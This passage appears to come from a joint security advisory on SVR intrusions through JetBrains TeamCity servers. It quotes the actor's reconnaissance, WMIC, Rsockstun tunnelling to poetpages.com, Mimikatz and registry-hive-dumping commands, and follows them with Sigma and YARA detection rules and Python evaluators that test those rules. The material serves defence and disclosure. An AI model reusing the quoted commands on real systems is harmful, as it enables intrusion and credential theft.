After the SVR built a secure foothold and gained an awareness of a victim’s TeamCity server, it then focused on network reconnaissance [T1590.004]. The SVR performed network reconnaissance using a mix of built-in commands and additional tools, such as a port scanner and PowerSploit, which it launched into memory [T1046]. The SVR executed the following PowerSploit commands:
Get-NetComputer
Get-NetGroup
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount
Get-NetDiDomain
Get-AdUser
Get-DomainUser -UserName
Get-NetUser -PreauthNotRequire
Get-NetComputer | select samaccountname
Get-NetUser -SPN | select serviceprincipalname
Tunneling into Compromised Environments
In selected environments the SVR used an additional tool named, “rr.exe”—a modified open source reverse socks tunneler named Rsockstun—to establish a tunnel to the C2 infrastructure [T1572].
The authoring agencies are aware of the following infrastructure used in conjunction with “rr.exe”:
65.20.97[.]203:443
Poetpages[.]com:8443
The SVR executed Rsockstun either in memory or using the Windows Management Instrumentation Command Line (WMIC) [T1047] utility after dropping it to disk:
wmic process call create "C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31"
Lateral Movement
The SVR used WMIC to facilitate lateral movement [T1047],[T1210].
wmic /node:"" /user:"" /password:"" process call create "rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost"
The SVR also modified DisableRestrictedAdmin key to enable remote connections [T1210].
It modified Registry using the following reg command:
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d "0" /f
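As an added example (not the advisory's own code, nor the Sigma project's), the following minimal evaluator runs three of the Sigma rules quoted earlier in this advisory (temp-to-temp compression, sensitive hive saves, and Lsa registry modification) over constructed process_creation and ps_script events built from the reg save, Compress-Archive and reg add commands quoted in the Sensitive Data Exfiltration, Privilege Escalation and Lateral Movement sections. The event field names follow the rules; the Image path and the benign event are constructed.

```python
import re

# Added example (not from the advisory): a minimal evaluator for three of the
# Sigma rules quoted in this advisory. It supports only the field modifiers
# those rules use (endswith, contains, contains|all, re) and the conditions
# they express, which is enough to see which quoted commands each rule catches.


def field_matches(event: dict, key: str, expected) -> bool:
    """Evaluate one selection entry such as 'CommandLine|contains|all': [...]."""
    field, *mods = key.split("|")
    value = str(event.get(field, ""))
    wanted = expected if isinstance(expected, list) else [expected]
    if "re" in mods:                        # Sigma 're' is a case-sensitive search
        hits = [re.search(p, value) is not None for p in wanted]
    elif "endswith" in mods:                # plain string modifiers are case-insensitive
        hits = [value.lower().endswith(str(v).lower()) for v in wanted]
    elif "contains" in mods:
        hits = [str(v).lower() in value.lower() for v in wanted]
    else:                                   # no modifier: exact match
        hits = [value == str(v) for v in wanted]
    return all(hits) if "all" in mods else any(hits)


def selection_matches(event: dict, selection: dict) -> bool:
    """All entries of one selection map are ANDed, as in Sigma."""
    return all(field_matches(event, k, v) for k, v in selection.items())


# The regexes below are copied verbatim from the rules quoted above.
RULES = [
    {
        "title": "Compressing files from temp to temp",
        "category": "ps_script",
        "selections": {"selection": {
            "ScriptBlockText|re": r".*Compress\-Archive.*Path.*Windows\\[Tt]{1}emp\\[1-9]{1}.*DestinationPath.*Windows\\[Tt]{1}emp\\.*",
        }},
        "condition": lambda s: s["selection"],
    },
    {
        "title": "Sensitive registry entries saved to file",
        "category": "process_creation",
        "selections": {
            "selection_base": {
                "Image|endswith": ["reg.exe"],
                "CommandLine|contains": "save",
                "CommandLine|re": r".*HKLM\\SYSTEM.*|.*HKLM\\SECURITY.*|.*HKLM\\SAM.*",
            },
            "selection_file": {"CommandLine|re": r".*sy\.sa.*|.*sam\.sa.*|.*se\.sa.*"},
        },
        "condition": lambda s: s["selection_base"] and s["selection_file"],
    },
    {
        "title": "Registry modification from cmd",
        "category": "process_creation",
        "selections": {"selection": {
            "Image|endswith": ["reg.exe"],
            "CommandLine|contains|all": ["CurrentControlSet", "Lsa"],
            "CommandLine|contains": ["DisableRestrictedAdmin", "NoLMHash"],
        }},
        "condition": lambda s: s["selection"],
    },
]

REG = r"C:\Windows\System32\reg.exe"   # constructed Image path
EVENTS = [  # command lines 0-4 are the ones quoted in this advisory
    {"category": "process_creation", "Image": REG,
     "CommandLine": r'reg save HKLM\SYSTEM "C:\Windows\temp\1\sy.sa" /y'},
    {"category": "process_creation", "Image": REG,
     "CommandLine": r'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v NoLMHash /t REG_DWORD /d "0" /f'},
    {"category": "process_creation", "Image": REG,
     "CommandLine": r'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d "0" /f'},
    {"category": "ps_script",
     "ScriptBlockText": r"Compress-Archive -Path C:\Windows\temp\1\ -DestinationPath C:\Windows\temp\s.zip -Force"},
    # Staging SQL Server DLLs into temp\1: the source is not under temp, so the
    # temp-to-temp rule does not fire on this one.
    {"category": "ps_script",
     "ScriptBlockText": r'Compress-Archive -Path "C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlmin.dll" -DestinationPath C:\Windows\temp\1\sql.zip'},
    # Constructed benign administrative export that should not fire.
    {"category": "process_creation", "Image": REG,
     "CommandLine": r"reg export HKLM\SOFTWARE\Contoso C:\backup\contoso.reg /y"},
]


def run_rules(events, rules=RULES):
    """Return (rule title, event index) for every rule/event pair that fires."""
    hits = []
    for i, event in enumerate(events):
        for rule in rules:
            if rule["category"] != event.get("category"):
                continue
            results = {name: selection_matches(event, sel)
                       for name, sel in rule["selections"].items()}
            if rule["condition"](results):
                hits.append((rule["title"], i))
    return hits


if __name__ == "__main__":
    for title, idx in run_rules(EVENTS):
        print(f"event {idx}: {title}")
```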
Adversary Toolset
In the course of the TeamCity operation, the SVR used multiple custom and publicly available open source tools and backdoors. The following custom tools were observed in use during the operation:
GraphicalProton is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs [T1027.001] to exchange data with the SVR operator.
After execution, GraphicalProton gathers environment information such as active TCP/UDP connections [T1049], running processes [T1049], as well as user, host, and domain names [T1590]. OneDrive is used as the primary communication channel while Dropbox is treated as a backup channel [T1567]. API keys are hardcoded into the malware. When communicating with cloud services, GraphicalProton generates a randomly named directory which is used to store infection-specific BMP files containing both commands and results [T1564.001]. The directory name is re-randomized each time the GraphicalProton process is started.
The BMP files used to exchange data were generated in the following way:
Compress the data using zlib,
Encrypt the data using a custom algorithm,
Add the “***” string literal to the encrypted data,
Create a random BMP containing a random rectangle,
And finally, encode the encrypted data within the lower pixel bits.
While the GraphicalProton backdoor has remained mostly unchanged over the months we have been tracking it, to avoid detection the adversary wrapped the tool in various layers of obfuscation, encryption, encoders, and stagers. Two specific variants of GraphicalProton “packaging” are especially noteworthy – a variant that uses DLL hijacking [T1574.002] in Zabbix as a means to start execution (and potentially provide long-term, hard-to-detect access) and a variant that masks itself within vcperf [T1036], an open-source C++ build analysis tool from Microsoft.
GraphicalProton HTTPS variant – a variant of the GraphicalProton backdoor recently introduced by the SVR that forgoes using cloud-based services as a C2 channel and instead relies on HTTP requests.
To legitimize the C2 channel, the SVR used a re-registered expired domain hosting a dummy WordPress website. Execution of the HTTPS variant of GraphicalProton is split into two files – a stager and an encrypted binary file that contains further code.
MITRE ATT&CK TACTICS AND TECHNIQUES
See the tables below for all threat actor tactics and techniques referenced in this advisory. For additional mitigations, see the Mitigations section.
Table 1: SVR Cyber Actors ATT&CK Techniques for Enterprise - Reconnaissance
Technique Title | ID | Use
Gather Victim Network Information: Network Topology | T1590.004 | SVR cyber actors may gather information about the victim’s network topology that can be used during targeting.
Gather Victim Host Information: Software | T1592.002 | SVR cyber actors may gather information about the victim’s host networks that can be used during targeting.
Table 2: SVR Cyber Actors’ ATT&CK Techniques for Enterprise – Initial Access
Technique Title | ID | Use
Exploit Public-Facing Application | T1190 | SVR cyber actors exploit internet-connected JetBrains TeamCity servers using CVE-2023-42793 for initial access.
Table 3: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Execution
Technique Title | ID | Use
Command and Scripting Interpreter: PowerShell | T1059.001 | SVR cyber actors used PowerShell commands to compress Microsoft SQL Server .dll files.
Command and Scripting Interpreter: Windows Command Shell | T1059.003 | SVR cyber actors execute these PowerShell commands to perform host reconnaissance: powershell ([adsisearcher]"((samaccountname=))").Findall().Properties; powershell ([adsisearcher]"((samaccountname=))").Findall().Properties.memberof; powershell Get-WmiObject -Class Win32_Service -Computername; powershell Get-WindowsDriver -Online -All
Exploitation for Client Execution | T1203 | SVR cyber actors leverage arbitrary code execution after exploiting CVE-2023-42793.
Hijack Execution Flow: DLL Side-Loading | T1574.002 | SVR cyber actors use a variant of GraphicalProton that uses DLL hijacking in Zabbix as a means to start execution.
Table 4: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Persistence
Technique Title | ID | Use
Scheduled Task | T1053.005 | SVR cyber actors may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code.
Server Software Component: SQL Stored Procedures | T1505.001 | SVR cyber actors abuse SQL Server stored procedures to maintain persistence.
Boot or Logon Autostart Execution | T1547 | SVR cyber actors used C:\Windows\system32\ntoskrnl.exe to configure automatic system boot settings to maintain persistence.
Table 5: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Privilege Escalation
Technique Title | ID | Use
Exploitation for Privilege Escalation | T1068 | SVR cyber actors exploit the JetBrains TeamCity vulnerability to achieve escalated privileges. To avoid detection, the SVR cyber actors used a “Bring Your Own Vulnerable Driver” technique to disable EDR and AV defense mechanisms.
Account Manipulation | T1098 | SVR cyber actors may manipulate accounts to maintain and/or elevate access to victim systems.
Table 6: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Defense Evasion
Technique Title | ID | Use
Obfuscated Files or Information: Binary Padding | T1027.001 | SVR cyber actors use BMPs to perform binary padding while the exchanged data is exfiltrated to their C2 station.
Masquerading | T1036 | SVR cyber actors use a variant that uses DLL hijacking in Zabbix as a means to start execution (and potentially provide long-term, hard-to-detect access) and a variant that masks itself within vcperf, an open-source C++ build analysis tool from Microsoft.
Process Injection | T1055 | SVR cyber actors inject code into AV and EDR processes to evade defenses.
Disable or Modify Tools | T1562.001 | SVR cyber actors may modify and/or disable tools to avoid possible detection of their malware/tools and activities.
Hide Artifacts | T1564 | SVR cyber actors may attempt to hide artifacts associated with their behaviors to evade detection.
Hide Artifacts: Hidden Files and Directories | T1564.001 | When communicating with cloud services, GraphicalProton generates a randomly named directory which is used to store infection-specific BMP files containing both commands and results.
Table 7: SVR Cyber actors’ ATT&CK Techniques for Enterprise: Credential Access
Technique Title | ID | Use
OS Credential Dumping: LSASS Memory | T1003.001 | SVR cyber actors executed Mimikatz commands in memory to gain access to credentials stored in memory.
OS Credential Dumping: Security Account Manager | T1003.002 | SVR cyber actors used the Mimikatz commands privilege::debug, lsadump::cache, lsadump::secrets, lsadump::sam, and sekurlsa::logonpasswords to gain access to credentials. Additionally, SVR cyber actors exfiltrated the Windows registry hives HKLM\SYSTEM, HKLM\SAM, and HKLM\SECURITY to steal credentials.
Credentials from Password Stores: Credentials from Web Browsers | T1555.003 | In a few specific cases, the SVR used the SharpChromium tool to obtain sensitive browser data such as session cookies, browsing history, or saved logins.
Steal or Forge Kerberos Tickets: Golden Ticket | T1558.001 | To secure long-term access to the environment, the SVR used the Rubeus toolkit to craft Ticket Granting Tickets (TGTs).
Table 8: SVR Cyber Actors ATT&CK Techniques for Enterprise: Discovery
Technique Title | ID | Use
System Owner/User Discovery | T1033 | SVR cyber actors use these built-in commands to perform host reconnaissance and user discovery: whoami /priv, whoami /all, whoami /groups, whoami /domain.
Network Service Discovery | T1046 | SVR cyber actors performed network reconnaissance using a mix of built-in commands and additional tools, such as a port scanner and PowerSploit.
Process Discovery | T1057 | SVR cyber actors use GraphicalProton to gather running process data.
Gather Victim Network Information | T1590 | SVR cyber actors use GraphicalProton to gather victim network information.
Table 9: SVR Cyber Actors ATT&CK Techniques for Enterprise: Lateral Movement
Technique Title | ID | Use
Exploitation of Remote Services | T1210 | SVR cyber actors may exploit remote services to gain unauthorized access to internal systems once inside a network.
Windows Management Instrumentation | T1047 | SVR cyber actors executed Rsockstun either in memory or using Windows Management Instrumentation (WMI) to execute malicious commands and payloads: wmic process call create "C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31"
Table 10: SVR Cyber Actors ATT&CK Techniques for Enterprise: Command and Control
Technique Title | ID | Use
Dynamic Resolution | T1568 | SVR may dynamically establish connections to command-and-control infrastructure to evade common detections and remediations.
Protocol Tunneling | T1572 | SVR cyber actors may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. In selected environments, the SVR used an additional tool named “rr.exe”—a modified open source reverse SOCKS tunneler named Rsockstun—to establish a tunnel to the C2 infrastructure.
Table 11: SVR Cyber Actors ATT&CK Techniques for Enterprise: Exfiltration
Technique Title | ID | Use
Automated Exfiltration | T1020 | SVR cyber actors may exfiltrate data, such as sensitive documents, through the use of automated processing after it is gathered during collection.
Exfiltration Over C2 Channel | T1041 | SVR cyber actors may steal data by exfiltrating it over an existing C2 channel. Stolen data is encoded into normal communications using the same protocol as C2 communications.
Exfiltration Over Web Service | T1567 | SVR cyber actors use OneDrive and Dropbox to exfiltrate data to their C2 station.
INDICATORS OF COMPROMISE
Note: Please refer to Appendix B for a list of IOCs.
VICTIM TYPES
As a result of this latest SVR cyber activity, the FBI, CISA, NSA, SKW, CERT Polska, and NCSC have identified a few dozen compromised companies in the United States, Europe, Asia, and Australia, and are aware of over a hundred compromised devices, though we assess this list does not represent the full set of compromised organizations. Generally, the victim types do not fit into any sort of pattern or trend, aside from having an unpatched, Internet-reachable JetBrains TeamCity server, leading to the assessment that the SVR’s exploitation of these victims’ networks was opportunistic in nature and not necessarily a targeted attack. Identified victims included: an energy trade association; companies that provide software for billing, medical devices, customer care, employee monitoring, financial management, marketing, sales, and video games; as well as hosting companies, tools manufacturers, and small and large IT companies.
DETECTION METHODS
The following rules can be used to detect activity linked to this adversary. They should be treated as examples and adapted to each organization’s environment and telemetry.
SIGMA Rules
title: Privilege information listing via whoami
description: Detects whoami.exe execution and listing of privileges
author:
references: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami
date: 2023/11/15
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - 'whoami.exe'
    CommandLine|contains:
      - 'priv'
      - 'PRIV'
  condition: selection
falsepositives: legitimate use by system administrator

title: DC listing via nltest
description: Detects nltest.exe execution and DC listing
author:
references:
date: 2023/11/15
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - 'nltest.exe'
    CommandLine|re: '.*dclist\:.*|.*DCLIST\:.*|.*dsgetdc\:.*|.*DSGETDC\:.*'
  condition: selection
falsepositives: legitimate use by system administrator

title: DLL execution via WMI
description: Detects DLL execution via WMI
author:
references:
date: 2023/11/15
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - 'WMIC.exe'
    CommandLine|contains|all:
      - 'call'
      - 'rundll32'
  condition: selection
falsepositives: legitimate use by software or system administrator

title: Process with connect and pass as args
description: Process with connect and pass as args
author:
references:
date: 2023/11/15
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    CommandLine|contains|all:
      - 'pass'
      - 'connect'
  condition: selection
falsepositives: legitimate use of rsockstun or software with exact same arguments

title: Service or Drive enumeration via powershell
description: Service or Drive enumeration via powershell
author:
references:
date: 2023/11/15
logsource:
  category: ps_script
  product: windows
detection:
  selection_1:
    ScriptBlockText|contains|all:
      - 'Get-WmiObject'
      - '-Class'
      - 'Win32_Service'
  selection_2:
    ScriptBlockText|contains|all:
      - 'Get-WindowsDriver'
      - '-Online'
      - '-All'
  condition: selection_1 or selection_2
falsepositives: legitimate use by system administrator

title: Compressing files from temp to temp
description: Compressing files from temp\ to temp used by SVR to prepare data to be exfiltrated
references:
author:
date: 2023/11/15
logsource:
  category: ps_script
  product: windows
detection:
  selection:
    ScriptBlockText|re: '.*Compress\-Archive.*Path.*Windows\\[Tt]{1}emp\\[1-9]{1}.*DestinationPath.*Windows\\[Tt]{1}emp\\.*'
  condition: selection

title: DLL names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific DLL names.
references:
author:
date: 2023/11/15
logsource:
  category: image_load
  product: windows
detection:
  selection:
    ImageLoaded|endswith:
      - 'AclNumsInvertHost.dll'
      - 'ModeBitmapNumericAnimate.dll'
      - 'UnregisterAncestorAppendAuto.dll'
      - 'DeregisterSeekUsers.dll'
      - 'ScrollbarHandleGet.dll'
      - 'PerformanceCaptionApi.dll'
      - 'WowIcmpRemoveReg.dll'
      - 'BlendMonitorStringBuild.dll'
      - 'HandleFrequencyAll.dll'
      - 'HardSwapColor.dll'
      - 'LengthInMemoryActivate.dll'
      - 'ParametersNamesPopup.dll'
      - 'ModeFolderSignMove.dll'
      - 'ChildPaletteConnected.dll'
      - 'AddressResourcesSpec.dll'
  condition: selection

title: Sensitive registry entries saved to file
description: Sensitive registry entries saved to file
author:
references:
date: 2023/11/15
logsource:
  category: process_creation
  product: windows
detection:
  selection_base:
    Image|endswith:
      - 'reg.exe'
    CommandLine|contains: 'save'
    CommandLine|re: '.*HKLM\\SYSTEM.*|.*HKLM\\SECURITY.*|.*HKLM\\SAM.*'
  selection_file:
    CommandLine|re: '.*sy\.sa.*|.*sam\.sa.*|.*se\.sa.*'
  condition: selection_base and selection_file

title: Scheduled tasks names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific scheduled task names
author:
references:
date: 2023/11/15
logsource:
  category: taskscheduler
  product: windows
detection:
  selection:
    EventID:
      - 4698
      - 4699
      - 4702
    TaskName:
      - '\Microsoft\Windows\IISUpdateService'
      - '\Microsoft\Windows\WindowsDefenderService'
      - '\Microsoft\Windows\WindowsDefenderService2'
      - '\Microsoft\DefenderService'
      - '\Microsoft\Windows\DefenderUPDService'
      - '\Microsoft\Windows\WiMSDFS'
      - '\Microsoft\Windows\Application Experience\StartupAppTaskCkeck'
      - '\Microsoft\Windows\Windows Error Reporting\SubmitReporting'
      - '\Microsoft\Windows\Windows Defender\Defender Update Service'
      - '\WindowUpdate'
      - '\Microsoft\Windows\Windows Error Reporting\CheckReporting'
      - '\Microsoft\Windows\Application Experience\StartupAppTaskCheck'
      - '\Microsoft\Windows\Speech\SpeechModelInstallTask'
      - '\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStart'
      - '\Microsoft\Windows\Data Integrity Scan\Data Integrity Update'
      - '\Microsoft\Windows\WindowsUpdate\Scheduled AutoCheck'
      - '\Microsoft\Windows\ATPUpd'
      - '\Microsoft\Windows\Windows Defender\Service Update'
      - '\Microsoft\Windows\WindowsUpdate\Scheduled Check'
      - '\Microsoft\Windows\WindowsUpdate\Scheduled AutoCheck'
      - '\Defender'
      - '\defender'
      - '\\Microsoft\\Windows\\IISUpdateService'
      - '\\Microsoft\\Windows\\WindowsDefenderService'
      - '\\Microsoft\\Windows\\WindowsDefenderService2'
      - '\\Microsoft\\DefenderService'
      - '\\Microsoft\\Windows\\DefenderUPDService'
      - '\\Microsoft\\Windows\\WiMSDFS'
      - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck'
      - '\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting'
      - '\\Microsoft\\Windows\\Windows Defender\\Defender Update Service'
      - '\\WindowUpdate'
      - '\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting'
      - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck'
      - '\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask'
      - '\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart'
      - '\\Microsoft\\Windows\\Data Integrity Scan\Data Integrity Update'
      - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'
      - '\\Microsoft\\Windows\\ATPUpd'
      - '\\Microsoft\\Windows\\Windows Defender\\Service Update'
      - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check'
      - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'
      - '\\Defender'
      - '\\defender'
  condition: selection

title: Scheduled tasks names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific scheduled task names
author:
references:
date: 2023/11/15
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - 'schtasks.exe'
    CommandLine|contains:
      - 'IISUpdateService'
      - 'WindowsDefenderService'
      - 'WindowsDefenderService2'
      - 'DefenderService'
      - 'DefenderUPDService'
      - 'WiMSDFS'
      - 'StartupAppTaskCkeck'
      - 'SubmitReporting'
      - 'Defender Update Service'
      - 'WindowUpdate'
      - 'CheckReporting'
      - 'StartupAppTaskCheck'
      - 'SpeechModelInstallTask'
      - 'BfeOnServiceStart'
      - 'Data Integrity Update'
      - 'Scheduled AutoCheck'
      - 'ATPUpd'
      - 'Service Update'
      - 'Scheduled Check'
      - 'Scheduled AutoCheck'
      - 'Defender'
      - 'defender'
  selection_re:
    Image|endswith:
      - 'schtasks.exe'
    CommandLine|re:
      - '.*Defender\sUpdate\sService.*'
      - '.*Data\sIntegrity\sUpdate.*'
      - '.*Scheduled\sAutoCheck.*'
      - '.*Service\sUpdate.*'
      - '.*Scheduled\sCheck.*'
      - '.*Scheduled\sAutoCheck.*'
  condition: selection or selection_re

title: Suspicious registry modifications
description: Suspicious registry modifications
author:
references:
date: 2023/11/15
logsource:
  category: registry_set
  product: windows
detection:
  selection:
    EventID: 4657
    TargetObject|contains:
      - 'CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin'
      - 'CurrentControlSet\\Control\\Lsa\\NoLMHash'
  condition: selection

title: Registry modification from cmd
description: Registry modification from cmd
author:
references:
date: 2023/11/15
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - 'reg.exe'
    CommandLine|contains|all:
      - 'CurrentControlSet'
      - 'Lsa'
    CommandLine|contains:
      - 'DisableRestrictedAdmin'
      - 'NoLMHash'
  condition: selection

title: Malicious Driver Load
description: Detects the load of known malicious drivers via their names or hash.
references:
  - https://github.com/wavestone-cdt/EDRSandblast#edr-drivers-and-processes-detection
author:
date: 2023/11/15
logsource:
  category: driver_load
  product: windows
detection:
  selection_name:
    ImageLoaded|endswith:
      - 'RTCore64.sys'
      - 'DBUtils_2_3.sys'
  selection_hash:
    Hashes|contains:
      - '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd'
      - '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5'
  condition: selection_name or selection_hash
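To show how the process_creation rules above behave on endpoint telemetry before they are loaded into a SIEM, here is an added Python evaluator (written for this page; it is not CISA's code and not a Sigma backend) that applies six of the Sigma selections to constructed Sysmon-style events, including the WMIC and reg command lines quoted in this advisory. It assumes the Sigma semantics noted in the docstring; the host, user and password values in the events are placeholders.

```python
"""Apply six of the Sigma process_creation rules above to constructed events.
Added example for this page, not CISA's code or a Sigma backend. Assumed
Sigma semantics: a selection ANDs its items; list values are OR-ed unless the
modifier carries |all; string modifiers are case-insensitive; `re` is an
unanchored, case-sensitive search."""
import re

# title -> {selection name: [(field, modifier, values)], "condition": fn(results)}
RULES = {
    "Privilege information listing via whoami": {
        "selection": [("Image", "endswith", ["whoami.exe"]),
                      ("CommandLine", "contains", ["priv", "PRIV"])],
        "condition": lambda s: s["selection"]},
    "DC listing via nltest": {
        "selection": [("Image", "endswith", ["nltest.exe"]),
                      ("CommandLine", "re",
                       [r".*dclist\:.*|.*DCLIST\:.*|.*dsgetdc\:.*|.*DSGETDC\:.*"])],
        "condition": lambda s: s["selection"]},
    "DLL execution via WMI": {
        "selection": [("Image", "endswith", ["WMIC.exe"]),
                      ("CommandLine", "contains|all", ["call", "rundll32"])],
        "condition": lambda s: s["selection"]},
    "Process with connect and pass as args": {
        "selection": [("CommandLine", "contains|all", ["pass", "connect"])],
        "condition": lambda s: s["selection"]},
    "Sensitive registry entries saved to file": {
        "selection_base": [("Image", "endswith", ["reg.exe"]),
                           ("CommandLine", "contains", ["save"]),
                           ("CommandLine", "re",
                            [r".*HKLM\\SYSTEM.*|.*HKLM\\SECURITY.*|.*HKLM\\SAM.*"])],
        "selection_file": [("CommandLine", "re",
                            [r".*sy\.sa.*|.*sam\.sa.*|.*se\.sa.*"])],
        "condition": lambda s: s["selection_base"] and s["selection_file"]},
    "Registry modification from cmd": {
        "selection": [("Image", "endswith", ["reg.exe"]),
                      ("CommandLine", "contains|all", ["CurrentControlSet", "Lsa"]),
                      ("CommandLine", "contains", ["DisableRestrictedAdmin", "NoLMHash"])],
        "condition": lambda s: s["selection"]},
}


def item_matches(field, modifier, values, event):
    """Evaluate one 'Field|modifier: values' line of a Sigma selection."""
    actual = str(event.get(field, ""))
    mods = modifier.split("|")
    if mods[0] == "re":
        hits = [re.search(v, actual) is not None for v in values]
    else:
        low, vals = actual.lower(), [v.lower() for v in values]
        if mods[0] == "contains":
            hits = [v in low for v in vals]
        elif mods[0] == "endswith":
            hits = [low.endswith(v) for v in vals]
        else:
            raise ValueError("unsupported modifier: " + modifier)
    return all(hits) if "all" in mods else any(hits)


def evaluate(event):
    """Return the titles of all rules whose condition holds for one event."""
    fired = []
    for title, rule in RULES.items():
        results = {name: all(item_matches(f, m, v, event) for f, m, v in items)
                   for name, items in rule.items() if name != "condition"}
        if rule["condition"](results):
            fired.append(title)
    return fired


# Constructed Sysmon-style events. The first three reuse command lines quoted
# in this advisory; host, user and password values are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic /node:"HOST" /user:"USER" /password:"***" process call create '
                    r'"rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost"'},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa '
                    r'/v DisableRestrictedAdmin /t REG_DWORD /d "0" /f'},
    {"Image": r"C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe",
     "CommandLine": "Sense.exe -connect poetpages.com -pass PLACEHOLDER"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save HKLM\SAM C:\Windows\Temp\sam.sa"},
    {"Image": r"C:\Windows\System32\whoami.exe", "CommandLine": "whoami /priv"},
    {"Image": r"C:\Windows\System32\nltest.exe", "CommandLine": "nltest /dclist:corp.example"},
    {"Image": r"C:\Windows\System32\sc.exe", "CommandLine": "sc query wuauserv"},  # benign
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(evaluate(ev) or ["-"], ev["CommandLine"][:60])
```

Note that the WMIC event contains "pass" (from /password:) but not "connect", so the Rsockstun rule stays quiet on it; that pair of substrings is the only thing the rule keys on, which is why its falsepositives entry matters.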
YARA rules
The following rule detects most known GraphicalProton variants.
rule APT29_GraphicalProton {
    strings:
        // C1 E9 1B                shr ecx, 1Bh
        // 48 8B 44 24 08          mov rax, [rsp+30h+var_28]
        // 8B 50 04                mov edx, [rax+4]
        // C1 E2 05                shl edx, 5
        // 09 D1                   or ecx, edx
        // 48 8B 44 24 08          mov rax, [rsp+30h+var_28]
        $op_string_crypt = { c1 e? (1b | 18 | 10 | 13 | 19 | 10) 48 [4] 8b [2] c1 e? (05 | 08 | 10 | 0d | 07) 09 ?? 48 }

        // 48 05 20 00 00 00       add rax, 20h ; ' '
        // 48 89 C1                mov rcx, rax
        // 48 8D 15 0A A6 0D 00    lea rdx, unk_14011E546
        // 41 B8 30 00 00 00       mov r8d, 30h ; '0'
        // E8 69 B5 FE FF          call sub_14002F4B0
        // 48 8B 44 24 30          mov rax, [rsp+88h+var_58]
        // 48 05 40 00 00 00       add rax, 40h ; '@'
        // 48 89 C1                mov rcx, rax
        // 48 8D 15 1B A6 0D 00    lea rdx, unk_14011E577
        // 41 B8 70 01 00 00       mov r8d, 170h
        // E8 49 B5 FE FF          call sub_14002F4B0
        // 48 8B 44 24 30          mov rax, [rsp+88h+var_58]
        // 48 05 60 00 00 00       add rax, 60h ; '`'
        // 48 89 C1                mov rcx, rax
        // 48 8D 15 6C A7 0D 00    lea rdx, unk_14011E6E8
        // 41 B8 2F 00 00 00       mov r8d, 2Fh ; '/'
        // E8 29 B5 FE FF          call sub_14002F4B0
        // 48 8B 44 24 30          mov rax, [rsp+88h+var_58]
        // 48 05 80 00 00 00       add rax, 80h
        // 48 89 C1                mov rcx, rax
        // 48 8D 15 7C A7 0D 00    lea rdx, unk_14011E718
        // 41 B8 2F 00 00 00       mov r8d, 2Fh ; '/'
        // E8 09 B5 FE FF          call sub_14002F4B0
        // 48 8B 44 24 30          mov rax, [rsp+88h+var_58]
        // 48 05 A0 00 00 00       add rax, 0A0h
        $op_decrypt_config = {
            48 05 20 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
            48 05 40 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
            48 05 60 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
            48 05 80 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
            48 05 A0 00 00 00
        }

    condition:
        all of them
}
Note: These rules are meant for threat hunting and have not been tested on a larger dataset.
MITIGATIONS
